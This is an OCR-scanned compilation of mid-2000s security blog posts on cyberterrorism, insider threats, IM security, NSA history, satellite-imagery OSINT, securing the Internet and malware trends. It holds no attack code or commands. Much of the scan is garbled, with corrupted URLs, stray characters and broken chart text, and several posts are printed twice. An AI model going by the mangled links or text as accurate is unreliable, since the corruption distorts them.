My worst case scenarios,though, consist of terrorists realizing the impact a target/mass 
directed intellectual property theft, [13]cryptoviral extortion attack targeting the majority of 


25 


U.S businesses. And as | often say, it’s all a matter of coordination with the idea to increase 
the impact! 


To conclude, Terrorists are not rocket scientists unless we make them feel so! 
Consider going through the following research for different point of views, and key facts : 


[14]How Modern Terrorism Uses the Internet 


[15]Examining the Cyber Capabilities of Islamic Terrorist Groups 


[16]The Power Failure and the Internet 


[17]Telecom - The Terrorism Risk 


[18]Emerging Terrorist Capabilities for Cyber Conflict against the U.S. Homeland 


[19]Myths and Realities of Cyberterrorism 


[20]Terrorism, Cyberspace and The First Amendment 


[21]Information Warfare: The Perfect Terrorist Weapon 


[22]Cyberland Security: Organised Crime, Terrorism and The Internet 
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[23]Cyber Terrorism: Mass Destruction or Mass Disruption? 


[24]Cyber Warfare: An Analysis of the Means and Motivations of Selected Nation States 
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1.1.6 Insiders - insights, trends and possible solutions (2005-12-19 15:33) 
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A recent research of the content monitoring market, and the U.S 2004’s "[1]Annual Report to 
Congress on Foreign Economic Collection and Industrial Espionage" I’ve recently read, 
prompted me to post an updated opinion on this largely unsolved issue. 


| have been keeping an eye on the insider problem for quite some time, in fact, | have 
featured a short article entitled “Insiders at the workplace - trends and practical risk 
mitigation approaches” in [2]|ssue 18 of the monthly [3]security newsletter you can freely 
subscribe yourself to! 


Insider 

as a definition can be as contradictive as the word “cheater” is :-) 

Does an individual become an insider even when thinking about it, or 

turns into such prior to initiating an action defined as insider’s one? 

The same way, can someone be defined as a “cheater” just for thinking 
about what’s perceived as cheating, compared to actually doing 

anything?! :-) When does one become the other, and is this moment of any 
importance to tackling the problem? 


The biggest trade-off as far 

as the insider’s problem is concerned is between dealing with the 
problem while ensuring productivity, and that the company’s work 
environment isn’t damaged - exactly the opposite. And while 
productivity is extremely important, the direct, or most often indirect 
and long-term loss of intellectual property theft is currently resulting 
in a couple of billion dollar unmaterialized revenues for 
nations/enterprises across the globe. 


Going through 2004's “[4]Annual Report to Congress on Foreign Economic Collection and 
Industrial Espionage”, 

a major trend needs to be highlighted as | greatly believe it’s a 

global one, namely, private enterprises efforts to obtain access to 
sensitive technologies in unethical way, outpaces a foreign government’s 
efforts to do the same. Corporations spy more on one another than 
governments do, but is this truly accurate? | don’t think so! The use of 
freelancers, among them ex-intelligence officers or experienced 
detective agencies to conduct national funded economic espionage is a 
growing trend, and the lines in this area are so blur, we should 

therefore try to grasp the big picture when it comes to national 
competitiveness - both companies and nations directly/indirectly 

benefit from possible economic/industrial espionage, and you can’t deny 
it! 
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Yet another important fact to keep in mind, is the unusually 

high success of the oldest, and most common sense social engineering 
attack - asking!! In certain cases a social engineer will inevitably 
establish contact with customer-service obsessed personnel taking care 
of you all your requests! A certain organization’s members may 
experience troubles differentiating sensitive and secret information, 

not taking the first one as serious as they should. Even worse - U.S 
Secret Service and CERT’s “[5]Insider threat Study : Illicit Cyber Activity in the Banking and 
Finance sector” reveal that,”83 % 

of the insider threat cases took place physically from within the 
insider’s organization, and another 70 % in all cases, the incidents took 
place during normal working hours”! No secretaries or CEO’s 

logging in at 3:00AM, and in this case, the lack of detected security 
incidents posed by insiders, means they are already happening! 


Though, 

| have always looked at the insider’s issue, from both negative and 
positive point of view. Can an insider be of any use for the good of a 
free speech organization or a government? Yes, it can if you take into 
account the U.S government’s efforts to locate democratically minded 
individuals living in countries with restrictive regimes, or active 
Internet censorship efforts. 


Now given, you are truly interested in the democratization of this particular region, and not 
another successful [6]PSYOPS 

operation, being able to locate, establish, and actually, maintain 

contact with these individuals will prove crucial in case of a objective 

picture of what exactly is going on there! Ignoring the local, totally 

biased news streaming for certain regions, and focusing on locating 

insiders within rogue states has been a common practice for years. 


Is 

there a market for protecting from intellectual property theft and 

sensitive information leakage? If so, how does it ensures today’s 

digital workplace, and road warriors’s flexibility is not sacrificed for 

the sake of protecting the company’s resources? Mind you, the current 
solutions scratch only the surface of the issue - creating digital 

signatures of data and trying to spot it leaving the network. While a 
commonly accepted approach, it’s like one way authentication(passwords) 
when it comes to access control- the first line of defense, but among 

the many other! 
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The insiders’ problem is far more broader one and 

given the today’s complexity and connectivity, a possible insider’s 
actions will most often constitute of normal daily activities. But what 
is the market up to anyway? 


Currently, the content monitoring 

market is steadily growing fueled by the need of ensuring information 
marked as sensitive, or intellectual property doesn’t leave the 
company’s premises, or is alerted when someone attempts to transfer it, 
due to negligance or on purposely! 


The main players are : [7]Vontu, [8]Tablus, [9]Reconnex, and [10]Vericept. 


Whereas these solutions are a great concept,they all mainly rely on content analysis,and 
sensitive information signatures,monitoring multiple exit 
point)(email,web,chats,forums,p2p,ftp, 

even telnet), namely, reactive protection, while sophisticated 

insider’s actions may remain hidden due to covert channels or Oday 

vulnerabilities in the vendor’s product for instance! 


Something 

else to consider, is should a |P(intellectual property) trap be 

considered as a benchmark for insider tensions?! In other words, should 
you consider an employee that has been on purposely sent a link 
containing company information he/she isn’t supposed to have access to, 
but has clicked to obtain it? [11]Stanford [12]thinks 

- yes! The University suspended potential candidates for obtaining info 
on their admission process only by following a link..you are either a 

one or zero, right? 


[13]Honeypots targeting insiders have also been discussed a long time ago by [14]Lance 
Spitzner, 
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from the Honeynet Project. Another proactive protection would be to 
look for patterns defined as malicious behavioral based mostly. 


From an organization’s point of view, take into consideration the following : 


Clearly communicate the consequences, both individual and career, in 
case an insider is somehow identified, based on the company’s perception 
of the problem 


- Ensure the momentum of negative 
attitude towards the organization is minimized to the minimum to ensure 
the lack of to-be-developed post-effect negative sentiments 


Do no fell victim of the common misunderstanding that technology is the 
key to the solution. Insiders are the people your technology resources 
empower to do their daily tasks, technology is as often happens, the 
faciliator of certain actions 


- Does system 

identification accountability have any actual effect? My point, does as 
user’s loss of accounting data, resulting in successful attack is anyhow 
prosecuted/tolerated. If it isn’t, this puts any employee in extremely 
favorable “it wasn’t my fault” position, where the data could be shared, 
on purposely exposed, sold, pretended to be stolen etc. 


Building active awareness towards the company’s efforts and commitment 
to fighting the problem will inevitably discourage the less motivated 
wannabe insiders, or at least make them try harder! 


From a nation’s point of view, the following issues should be taken into consideration : 


In today’s increasingly transparent and based on digital flow of 
information marketplace, open source intelligence capabilities played a 
leading role in the development of cost-effective competitive 
intelligence solutions. Even though, nations or their companies are very 
interested in exploiting today’s globalized world. 


Ensuring the adequate security level of the private and academic 
sectors’ infastructure(where research turns into products and services, 
or exactly the opposite) through legislations, or further incentives, 

will improve the national competitiveness, while preserving the current 
R &D innovations, as secret as necessary. 


Outsourcing should be considered as a important factor contributing to 
information leakage, and the individuals involved, or the company’s 
screening practices, should be carefully examined. 


- A fascinating publication that | recently read is “[15]Quantifying National Information 
Leakage” 

describing the implications of the Internet’s distributed nature, 

namely to what extend, U.S Internet traffick is leaking around the 

world, where it “passes by”. A nation’s habit or lack of efficient 

alternative of plain-text communications can prove tricky if 

successfully exploited. Of course, this doesn’t include conspiracy 

scenarios of major certificate authorities breached into. 


The 

insiders’ problem will remain an active topic for discussion for years 
to come given its complexity and severity of implications. Insiders’s 
metrics are a key indicator for patterns tracking, whereas their 
creativity shouldn’t be underestimated at any cost! 
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In case you are interested in various recommended reading, statistics, and other people’s 
point of view, try this research : 


[16]Understanding the Insider Threat - Proceedings of a March, 2004 Workshop 


[17]A Target-Centric Formal Model For Insider Threat and More 


[18]Analysis and Detection of Malicious Insiders 


[19]Insider Threat : Real Data on a Real Problem 


[20]Insider Threat Study : Computer System Sabotage in Critical Infrastructure Sectors 


[21]Preliminary System Dynamics Maps of the Insider Cyber-threat Problem 


[22]Technological, Social, and Economic Trends That Are Increasing U.S. Vulnerability to 
Insider Espionage 


[23]Preventing Insider Sabotage : Lessons Learned From Actual Attacks 


33 


Technorati tags : [24]insiders,[25]insider,[26]espionage,[27]enterprise risk 
management,[28]security,[29]information security 
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2006 


2.1 January 


2.1.1 What’s the potential of the IM security market? Symantec thinks big 
(2006-01-04 12:18) 


Yesterday, Symantec, one of the world’s leading security, and of course, storage providers 
[1Jaquired [2]IMlogic, a leading provide of Instant Messaging security solutions. How sound is 
this move anyway? Doesn’t Symantec already have the [3]necessary [4]experience in this 
field? 


IMlogic has never been a build-to-flip company. Dating back to 2002, it has managed to 
secure important customers, Fortune 1000 companies as a matter of fact, and acts as a 
prefered choice for many of them. And given that enterprise IM is exploding, and so it home 
use, the real-time nature of this type of communication has always been acting as a hit-list in 
my mind. Client based vulnerabilities, social engineering attacks, auto-responding malware, 
and many other issues are among the current trends. 


How huge is the potential of IM security, or is it me just trying to think big in here, compared 
to Symantec’s simple product line extension ambition? Besides acting as another propagation 
vector for future malware releases, IM usege worldwide is already outpacing the most 
common form of Internet communication - the email. A Radicati Group’s research report 
entitled "[5]lnstant Messaging and Presence Market Trends, 2003-2007" indicates the same. 


The group [6]predicts that : 
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[7][8] - 1,439 million IM accounts in existence by 2007 


- avery significant increase in corporate imlpementation of IM, from 60 million accounts today 
to 349 million in 2007. 


- that’s a degree of monopoly, as always! 


Lucky you, Symantec! 


With fear of being a pessimist, | have though witnessed how unique organizatons and teams 
got eventually swallowed by the corporate world. And it’s [9]their know-how that | truly miss 
these days. 


You can though, still go through Symantec’s constantly updating list of [l1O]acquired 
companies, and it’s evident they are fully committed to continue being a market and 
knowledge leader. | also recommend you read a great aricle at eWeek entitled [11]IM Threats 
: The Dark Side of Innovation to find out more about the current trends. What’s your attitude 
about them?! 


Technorati tags : 


[12]Symantec, [13]IM, [14]security, [15]information security 


. http: //www.symantec.com/about/news/release/article. jsp?prid=20060103_01 


| fep://wwy.imlogic. conf 

_http:/ /securstyresponse. symantec. con/avcenter reference /aecure. instant messaging. pal 
kop: / /securityresponse, symantec, con/avcouter /reference/threate, to. instant messaging. pid 
_hetp://amy.ostermanresearch.con/or_sn05es.paf 


OuRWNEH 


ttp://online.wsj.com/public/article/SB112907349731466067- fBOn6k6c3HC_Kcim4M6p9jHeagE_20061011.htm1?mod= 


7. http://online.wsj.com/public/resources/images/MK-AF175_MSN_YA10112005182104. gif 
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ttp://online.wsj.com/public/resources/images/MK-AF175_MSN_YA10112005182104.gif 


9. http: //www.atstake.com/ 
10. http://www.symantec.com/about/profile/development/acquisitions/index. jsp 
11. http://www.eweek.com/article2/0, 1895, 1904984, 00.asp 


13. http://technorati.com/tag/IM 
14. bttp://technorati.com/tag/securit 
15. http://technorati.com/tag/information+securit 


12. http://technorati.com/tag/Symantec 


2.1.2 Keep your friends close, your intelligence buddies closer! (2006-01-04 13:11) 


[1]Too much power always leads you to the dark side! 


[2]Cryptome has yesterday [3]featured a excerpt from "[4]State of the War : The Secret 
History of the CIA and the Bush Administration" shredding more light on what the NSA used 
to be before 9/11 and how things changed at a later stage. In case you really want to find out 
more about the entire history of the NSA, go though "[5]The Quest for Cryptologic 
Centralization and the Establishment of NSA, 1940-1952", and some of the most remarkable 
NSA released publication entitled "[6]Eavesdropping on Hell : Historical Guide to Western 
Communications Intelligence and the Holocaust, 1939-1945". 


My opinion - With no guards, the gates are always open. But who will watch the watchers 
when they start watching us?! 


Even though, as Marine Corps General Alfred M. Gray have put it years ago "Communications 
without intelligence is noise, intelligence without communications is irrelevant", and so is 
privacy in the 21st century, period. 
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Technorati tags : 


[7]NSA, [8]intelligence, [9]Jeavesdropping, [LOJCIA 


http: //www.tlio.demon.co.uk/eyesky. jpg 
ttp://cryptome.org/ 
ttp://cryptome. org/nsa- program. htm 


http: //btobsearch.barnesandnoble.com/booksearch/isbninquiry .asp?btob=Yéendeca=yk&cds2Pid=154&isbn=07432706 


10. http://technorati.com/tag/CIA 
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2.1.3 Security quotes : a FSB (successor to the KGB) analyst on Google Earth 
(2006-01-04 13:38) 


[1]"Lt. Gen. Leonid Sazhin, an analyst for the Federal Security Service, the Russian security 
agency that succeeded the K.G.B., was quoted by Itar-Tass as saying: "Terrorists don’t need 
to reconnoiter their target. Now an American company is working for them." A great [2]quote, 
and | find it totally true. The point is, not to look for high-resolution imagery, but to harness 
the power of OSINT, improve their confidence by observing the targets "from the sky", and 
actually plan and coordinate its activities on huge territories. AJAX anyone? :) 


However, the public has always been good at bringing the real issue to the rest of the 
world. There have been [3]numerous [4]Jattempts to spot sensitive locations, and | wouldn’t 
be myself if | don’t share the joys of the [5]Eyeball Series with you. Of course, in case you 
haven’t come across the initiative earlier. 


However, the way it gives terrorists or enemies these opportunities, it also serves the 
general public by acting as an evidence for the existence of espionage sentiments, here 
and there. [6]Echelon’s Yakima Research Station was spotted on GoogleMaps, originally by 
Cryptome, see the dishes there? Any thoughts in here? Can Microsft’s [7]Local Live with 
its highly differentiated bird eye view on important locations turn into a bigger risk the the 
popularity of Google’s services? 
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Technorati tags : 


[8]Google Earth,[9]Google Maps,[10]satellite imagery,[11JOSINT,[12]security,[13]terrorism 


: 
2 

3 
4. 
5. 

6. 


ttp://maps .google.com/maps?q=yakima, +wakt=k&amp; amp;amp; amp;amp;amp;amp; amp;amp; amp;amp; amp; amp; amp; hl=e 


&11=46 .682193 ,-120.356877&spn=0 .006801, 0.019913k%0m=1 
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2.1.4 How to secure the Internet (2006-01-04 14:22) 


[1] recently wondered, are there any existing government practices towards securing the 
entire Internet? 


So | went though the [2]U.S National Strategy to Security Cyberspace, to find out what 
is the U.S up to given it stillmaintains "control" of the Internet. What is the Internet’s biggest 
weakness? No, it’s not a sophisticated term, its a common word called design. 


A fact that is often neglected as the core of all problems, is that the Net’s design by 
itself was primarily developed for reseach purposes. That is, universities and scientists 
exchanging data, users whose activities would definitely not result in the following :) 


- infect the competing Ivy League universities with malware, and "borrow" as much intel- 
lectual property as possible 
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- Conduct DNS poisoning and redirect their competition’s site to their own one 


- Eavesdrop on their fellow researcher's communications 


The Internet wasn’t mean to be as secure as we wished it could be today. So, when it 
became public and turned into today’s part of daily life, | feel this weakness started to remerge 
on a harge scale. 


Perhaps the second biggest vulnerability is the ability to forge source addresses, and 
given you can spoof the origins of your packet no accountability for a great deal of today’s 
threats is present. IPv6 isn’t the panacea of security, and would never be though. There are 
as a matter of fact a lot of vulnerabilities related to mostly, implementation, and awareness 
on the possibilities. But the introduction of IPv6 over the Internet, still remains an ambition for 
goverments and organizations across the world. As a matter of the the U.S [3]DoD indicated 
their troubles while migrating to IPv6, but they desperately [4]need it. Though, | greatly feel 
the sooner the better. 


The current Internet IP space is so easily mapped and datamined, that on most occa- 
sions,such transparence is mostly beneficial to malicious attackers. | believe that security 
threats can indeed have a national security impact, of course, given their sevirity and actual 
abuse. Today’s information and knowledge driven societies are largely dependent on informa- 
tion and technology infrastructure for most of their needs. This has on the other hand boosted 
a tremendous technological growth. It eventually resulted in an increased world productivity, 
but the dependance can also affect real life situations on certain ocassions. 


Can cyberspace indeed influence real-life situations and cause havoc? 
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Would someone wants to bring down the Internet, and how sound is this? What are the 
main driving factors behind the known weaknesses of the infrastructure, and how can their 
negative effects be prevented? 


| greatly feel that the growth of E-governments, native Internet population, improved 
communication infrastructure, thus more bandwidth and opportunities,are crucial for the 
growth of a nation. The only weakness besides actual usability or utilization, is Security. 


Going back to the report, it clearly highlights and takes into consideration both, soft and 
hard dollars. 


That is, enemies conducting espionage over companies, universities, or mapping key 
government, industry networks, and easily reachable known targets to be used later on. 
Hit-lists for potential targets can be easily gathered in today’s open source intelligence world. 


On a worldwide basis, the implications to the entire Internet posed by insecure DNS servers, 
and by the insecurities of the DNS protocol can undermine the Internet in itself. What happens 
when all sites are actually there, but remain unreachable worldwide? The 2002 [5]attacks on 
the root Internet servers indeed acted as a wake up to the international community on how 
fragile the current system really can be. 


Some of the obstacles for a secure Internet from my point of view consist of : 


- Plain text communications are the easiest, most common way malicious attackers can 
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abuse a nation’s communications, excluding the fact that the majority of communications 
remain unencrypted 


- Lack of evolving compliance, threats change so fast, that everyone can barely keep up 
with them, and what used to be "secured" yesterday, is vulnerable today 


- Less procedures and strategies, more actions, perfecting planning is futile, by the time 
you end you planning process you would have to change everything. My point is, empower 
those who are able to execute real actions towards improving security. 


- The gap between government, private and academic sectors is resulting in a lack of in- 
tegrated early warning systems, that would eventually benefit everyone 


- Realization of a nationwide client-side sensor, | have also considered Symante’s utiliza- 


tion of their 120M client based as the biggest, most sensitive honeypot ever. 


To sum up my ideas, migration to the, at least though to be more secure Internet2 , 
would take years and cost billions of dollars on a worldwide basis, yet it’s worth it! 


Have an opinion? Share it! 


Technorati tags : 


[6]cyberspace,[7]security,[8]information security,[9]IPv6,[10]Internet2 
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. http://photos1. blogger .com/blogger/1933/1779/1600/scroll_clip.gi 
. http: //www.whitehouse. gov/pcipb/cyberspace_strategy.pd 
. http: //www.defenselink.mil/ 
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. http: //www.usipv6.com/2003arlington/presents/Marilyn_Kraus. pdf 
. http://www.caida. org/projects/dns-analysis/oct02dos.xm 

. http: //technorati.com/tag/cyberspace 

. http://technorati.com/tag/securit 


. http: //technorati.com/tag/informationtsecurit 


. http: //technorati.com/tag/IPv6 


10. http://technorati.com/tag/Internet2 
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2.1.5 Happy New Year folks!! (2006-01-04 17:15) 


Dear friends and visitors, 


Happy New Year and sincere apologies 

for the lack of updates on my blog recently. It’s not that | have 
somehow stopped brainstorming on how to put my knowledge into neat 
posts, rather, | didn’t have the time that | wanted to provide an 
in-depth overview of they key topics | had in mind :-) 


| wish you all the best in 2006, thank for your feedback on my ideas, and keep ridin’ on 
the road of intellectual exploration! 


2.1.6 What’s the potential of the IM security market? Symantec thinks big 
(2006-01-04 17:17) 


Yesterday, Symantec, one of the world’s leading security, and of course, storage providers 
[1Jaquired [2]IMlogic, a leading provide of Instant Messaging security solutions. How sound 
is this move anyway? Doesn’t Symantec already have the [3]necessary [4]experience in this 
field? 


IMlogic 

has never been a build-to-flip company. Dating back to 2002, it has 
managed to secure important customers, Fortune 1000 companies as a 
matter of fact, and acts as a prefered choice for many of them. And 
given that enterprise IM is exploding, and so it home use, the real-time 
nature of this type of communication has always been acting as a 

hit-list in my mind. Client based vulnerabilities, social engineering 
attacks, auto-responding malware, and many other issues are among the 
current trends. How huge is the potential of IM security, or is it me 

just trying to think big in here, compared to Symantec’s simple product 
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line extension ambition? 


Besides acting as another propagation 

vector for future malware releases, IM usege worldwide is already 

outpacing the most common form of Internet communication - the email. A 

Radicati Group’s research report entitled "[5]lnstant Messaging and Presence Market Trends, 
2003-2007" indicates the same. The group [6]predicts that : 


Fingers Do 
The Talking 


Companies’ share 
of users who have 
installed consumer 


instant-messaging 
services world-wide: 


Notes: Excludes eBay's 
Skype; numbers do not add 
up to 100% due to rounding 


Source: The Radicati Group Google 1% 


[7] - 1,439 million IM accounts in existence by 
2007 


- a very significant increase in corporate imlpementation of IM, from 60 million accounts 
today to 349 million in 2007. 


- that’s a degree of monopoly, as always! 


Lucky you, Symantec! 


With 

fear of being a pessimist, | have though witnessed how unique 

organizations and teams got eventually swallowed by the corporate world. 

And it’s [8]their know-how that | truly miss these days. You can though, still go through 
Symantec’s constantly updating list of [9Jacquired 

companies, and it’s evident they are fully committed to continue being a 

market and knowledge leader. | also recommend you read a great aricle 

at eWeek entitled [10]IM Threats : The Dark Side of Innovation to find out more about the 
current trends. What’s your attitude about them?! 
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Technorati tags : 


[11]Symantec, [12]IM, [13]security, [14]Jinformation security 
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2.1.7 Keep your friends close, your intelligence buddies closer! (2006-01-04 17:18) 


Too much power always leads you to the dark side! 


[2]Cryptome has yesterday [3]featured a excerpt from "[4]State of the War : The Secret 
History of the CIA and the Bush Administration" 

shredding more light on what the NSA used to be before 9/11 and how 

things changed at a later stage. In case you really want to find out 

more about the entire history of the NSA, go though "[5]The Quest for Cryptologic 
Centralization and the Establishment of NSA, 1940-1952", and some of the most remarkable 
NSA released publication entitled "[6]Eavesdropping on Hell : Historical Guide to Western 
Communications Intelligence and the Holocaust, 1939-1945". 
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My opinion - With no guards, the gates are always open. But who will watch the watchers 
when they start watching us?! 


Even 

though, as Marine Corps General Alfred M. Gray have put it years ago 
"Communications without intelligence is noise, intelligence without 
communications is irrelevant", and so is privacy in the 21st century, 
period. 


Technorati tags : 


[7]NSA, [8]intelligence, [9]Jeavesdropping, [LO]CIA 


https://web.archive. org/web/20101103154218/http://www.tlio.demon.co.uk/eyesky. jpg 


ttp://cryptome.org/ 
ttp://cryptome.org/nsa- program. ht 


http: //btobsearch. barnesandnoble.com/booksearch/isbninquiry .asp?btob=Yxendeca=yk&cds2Pid=154&isbn=07432706 


10. http://technorati.com/tag/CIA 
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2.1.8 Security quotes : a FSB (successor to the KGB) analyst on Google Earth 
(2006-01-04 17:19) 


[1] 
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Gen. Leonid Sazhin, an analyst for the Federal Security Service, the 
Russian security agency that succeeded the K.G.B., was quoted by 
Itar-Tass as saying: "Terrorists don’t need to reconnoiter their target. 
Now an American company is working for them." A great [2]quote, 
and | find it totally true. The point is, not to look for 

high-resolution imagery, but to harness the power of OSINT, improve 
their confidence by observing the targets "from the sky", and actually 
plan and coordinate its activities on huge territories. AJAX anyone? :) 


However, the public has always been good at bringing the real issue to the rest of the 
world. There have been [3]numerous [4]Jattempts to spot sensitive locations, and | wouldn’t 
be myself if | don’t share the joys of the [5]Eyeball Series 

with you. Of course, in case you haven’t come across the initiative 

earlier. However, the way it gives terrorists or enemies these 

opportunities, it also serves the general public by acting as an 

evidence for the existence of espionage sentiments, here and there. [6]Echelon’s Yakima 
Research Station was spotted on GoogleMaps, originally by Cryptome, see the dishes there? 
Any thoughts in here? Can Microsft’s [7]Local Live 

with its highly differentiated bird eye view on important locations 

turn into a bigger risk the the popularity of Google’s services? 


Technorati tags : 


[8]Google Earth,[9]Google Maps,[10]satellite imagery,[11]OSINT,[12]security,[13]terrorism 
AT 


https://web.archive. org/web/20101103203555/http://www.abc .net.au/reslib/200508/r54856_148962. jpg 


. http://www. jsonline.com/bym/news/dec05/379002.asp 
. http://www. theregister.co.uk/2005/10/14/google_earth_competition_results/ 
. http://www. theregister.co.uk/2005/09/13/google_earth_threatens_democracy/ 


http: //www.eyeball-series.org/ 
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http://maps. google. com/maps?q=yakima, +wakt=k&amp ;amp; amp;amp; amp;amp; amp; amp;amp; amp;amp; amp ;hl=enk11=46. 
682193, -120.356877kspn=0. 006801, 0.019913ko0m=1 


7. http://local.live.com/ 
8. http: //technorati.com/tag/Google+Earth 
9. http: //technorati.com/tag/Google+Maps 


10. http://technorati.com/tag/satellite+imager 
11. http://technorati.com/tag/OSIN 


12. http://technorati.com/tag/securit 
13. http://technorati.com/tag/terrorism 


2.1.9 How to secure the Internet (2006-01-04 17:21) 


[1 
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| recently wondered, are there any existing government practices towards securing the entire 
Internet? 


So | went though the [2]U.S National Strategy to Security Cyberspace, 
to find out what is the U.S up to given it still maintains "control" of 
the Internet. What is the Internet’s biggest weakness? No, it’s nota 
sophisticated term, its a common word called design. 


A fact that 

is often neglected as the core of all problems, is that the Net’s design 
by itself was primarily developed for reseach purposes. That is, 
universities and scientists exchanging data, users whose activities 
would definitely not result in the following :) 
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- infect the competing Ivy League universities with malware, and "borrow" as much intel- 
lectual property as possible 


- Conduct DNS poisoning and redirect their competition’s site to their own one 


- Eavesdrop on their fellow researcher’s communications 


The 

Internet wasn’t mean to be as secure as we wished it could be today. 
So, when it became public and turned into today’s part of daily life, | 
feel this weakness started to remerge on a harge scale. 


Perhaps 

the second biggest vulnerability is the ability to forge source 

addresses, and given you can spoof the origins of your packet no 

accountability for a great deal of today’s threats is present. IPv6 

isn’t the panacea of security, and would never be though. There are as a 

matter of fact a lot of vulnerabilities related to mostly, 

implementation, and awareness on the possibilities. But the introduction 

of IPv6 over the Internet, still remains an ambition for goverments and 

organizations across the world. As a matter of the the U.S [3]DoD indicated their troubles 
while migrating to IPv6, but they desperately [4]need it. Though, | greatly feel the sooner the 
better. 


The 

current Internet IP space is so easily mapped and datamined, that on 
most occasions,such transparence is mostly beneficial to malicious 
attackers. | believe that security threats can indeed have a national 
security impact, of course, given their sevirity and actual abuse. 

Today’s information and knowledge driven societies are largely dependent 
on information and technology infrastructure for most of their needs. 

This has on the other hand boosted a tremendous technological growth. It 
eventually resulted in an increased world productivity, but the 
dependance can also affect real life situations on certain ocassions. 
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Can cyberspace indeed influence real-life situations and cause havoc? Would 
someone wants to bring down the Internet, and how sound is this? What 

are the main driving factors behind the known weaknesses of the 
infrastructure, and how can their negative effects be prevented? 


| 

greatly feel that the growth of E-governments, native Internet 

population, improved communication infrastructure, thus more bandwidth 
and opportunities,are crucial for the growth of a nation. The only 
weakness besides actual usability or utilization, is Security. 


Going 

back to the report, it clearly highlights and takes into consideration 

both, soft and hard dollars. That is, enemies conducting espionage over 
companies, universities, or mapping key government, industry networks, 
and easily reachable known targets to be used later on. Hit-lists for 
potential targets can be easily gathered in today’s open source 
intelligence world. 


On a worldwide basis, the implications to the 

entire Internet posed by insecure DNS servers, and by the insecurities 

of the DNS protocol can undermine the Internet in itself. What happens 

when all sites are actually there, but remain unreachable worldwide? The 

2002 [5]attacks on the root Internet servers indeed acted as a wake up to the international 
community on how fragile the current system really can be. 


Some of the obstacles for a secure Internet from my point of view consist of : 


Plain text communications are the easiest, most common way malicious 
attackers can abuse a nation’s communications, excluding the fact that 
the majority of communications remain unencrypted 


- Lack of 

evolving compliance, threats change so fast, that everyone can barely 
keep up with them, and what used to be "secured" yesterday, is 
vulnerable today 
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- Less procedures and strategies, more actions, 

perfecting planning is futile, by the time you end you planning process 

you would have to change everything. My point is, empower those who are 
able to execute real actions towards improving security. 


- The 

gap between government, private and academic sectors is resulting in a 
lack of integrated early warning systems, that would eventually benefit 
everyone 


- Realization of a nationwide client-side sensor, | have 
also considered Symante’s utilization of their 120M client based as the 
biggest, most sensitive honeypot ever. 


To sum up my ideas, 

migration to the, at least though to be more secure Internet2 , would 
take years and cost billions of dollars on a worldwide basis, yet it’s 
worth it! 


Have an opinion? Share it! 


Technorati tags : 


[6]cyberspace,|[7]security,[8]information security,[9]IPv6,[10]Internet2 
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. http://technorati.com/tag/informationtsecurit 
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2.1.10 Malware - future trends (2006-01-09 17:22) 


[1] I’m very excited to let you know that, | have finally managed to 
release my [2]"Malware - future trends" 

publication. Basically, it will provide you with an overview of the 

current trends, the driving factors behind the scene, and some 

of the trends to come, from my point of view. 


As factors contributing to the rise and success of malware | have pointed out : 
- Documentation and howto’s transformed into source code 

- Vulnerabilities, even patches, easily turned into exploits 

- Clear signs of consolidation on the malware scene 

- The media as a fueling factor for growth 

- Over 960M unique Internet users and their connectivity, or purchasing power 


- The demand for illegal services 


And as far as the trends themselves are concerned, | have indicated : 
- Mobile malware will be successfully monetized 

- Localization as a concept will attract the coders’ attention 

- Open Source Malware 

- Anonymous and illegal hosting of (copyrighted) data 

- The development of Ecosystem 


- Rise in encryption and packers 
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- Oday malware on demand 

- Cryptoviral extortion / Ransomware will emerge 

- When the security solutions (antivirus etc.) ends up the security problem itself 
- Intellectual property worms 

- Web vulnerabilities, and web worms - diversity and explicit velocity 

- Hijacking botnets and infected PCs 


- Interoperability will increase the diversity and reach of the malware scene 


Have an opinion? Feel | have somehow missed a point? Let me know, or directly com- 
ment on this post! Thanks folks! 


Technorati Tags : 


[3]malware,[4]Jantivirus,[5]security,[6]information security,[7]malware trends,[8]viruses 
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2.1.11 Watch out your wallets! (2006-01-10 17:24) 


[1]| Te 2002 HowstuttWorks The irony of today’s, obviously not working loan system, has left 
a 22 years old Chicago student in [2]debt of $412,000. 
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A very scary event, that I feel could have been prevented if the loss 
was reported, and the bank giving the loans was somehow aware of the 
social status of the "borrower" :) 


In case you are interested in knowing more about identity theft, go through the follow- 
ing: 


[3]ID Theft : When Bad Things Happen to Your Good Name 
[4]Coping with Identity Theft : Reducing the Risk of Fraud 


[5]The Problem of Identity Theft 


Technorati tags : 


[6]identity theft,[7]security,[8]information security,[9]fraud 
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2.1.12 Would we ever witness the end of plain text communications? 
(2006-01-10 17:25) 


[1] Last week, a report released by the research firm 
In-Sat estimated that [2]revenues for IP VPNs will double between 2004 and 2009 to $658 
million. 


Estimates 

should also be questioned, though the trend is very relevant these days. 
VPNs as a concept are the natural shift from avoiding plain text data 
exchange over the insecure by default Internet. Yet, secure 
communication channel doesn’t mean actual attacks on the both, the 
channel and the host itself cannot be executed. Though, | think that 
avoiding plain text communications at all is a strategic step of a great 
important. 


How you can take advantage of this trend? 
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Given 

the market is actively growing, namely a lot of new entrants, it would 
mean a lot of product/service choice and very competitive pricing 
schemes. Keep track of them, and ensure your TOC is as low as 
possible,think in the long-term. 


What to keep in mind? 


Do 

your homework, and while a newly established company offers might seem 
attractive compared to an established vendor’s one in respect to 
pricing, don’t ignore expertise and quality for a short-term deal. On 

the other hand, make sure you are aware of the fact, that vendors will 
rush into offering many other cross-sale services. We are already 
witnessing such vendors being as confident as to launch their own 
anti-virus solutions. That’s exactly the type of companies whose product 
extension services you should avoid, as they are basically reinventing 
the wheel, with the idea to cut paying any royalties to the established 
anti virus vendors. TOC, experise, value oriented and flexible vendorare 
the things to keep in mind, given you don’t have something else in 
mind? 


Technorati tags : 


[3]VPN, [4]security,[5] information security, [6]secure communications 
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2.1.13. Why we cannot measure the real cost of cybercrime? (2006-01-10 17:28) 
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THE COST OF 
CYBERCRIME 


ew __ ON IT SECURITY 
SERVICES AND PRODUCTS 


‘00 ‘Ol =4'02 ‘03 ‘04 ‘05 ‘06 
A BILLIONS OF DOLLARS 


[1] load nent sengh le At the end of 2005, a rather contradictive statement 


was made, namely, that the [2]costs of cybercrime 

have surpassed those of drug smuggling? And while | feel it has been 
made in order to highlight the threats posed by today’s cyber 
insecurities, | find it a bit of an unrealistic one. 


Mainly because of : 


- the lack of centralized database and approach to keep track of, and measure the costs of 
cyber crime 


Centralization 

is useful sometimes, and so is standardization. My point is that, 

doesn’t matter how many metrics | go through on a monthly basis. They 
all have had different approaches while gathering their data. Estimated 
or projected loses are a tricky thing the way [3]Donald Trump’s valuation 
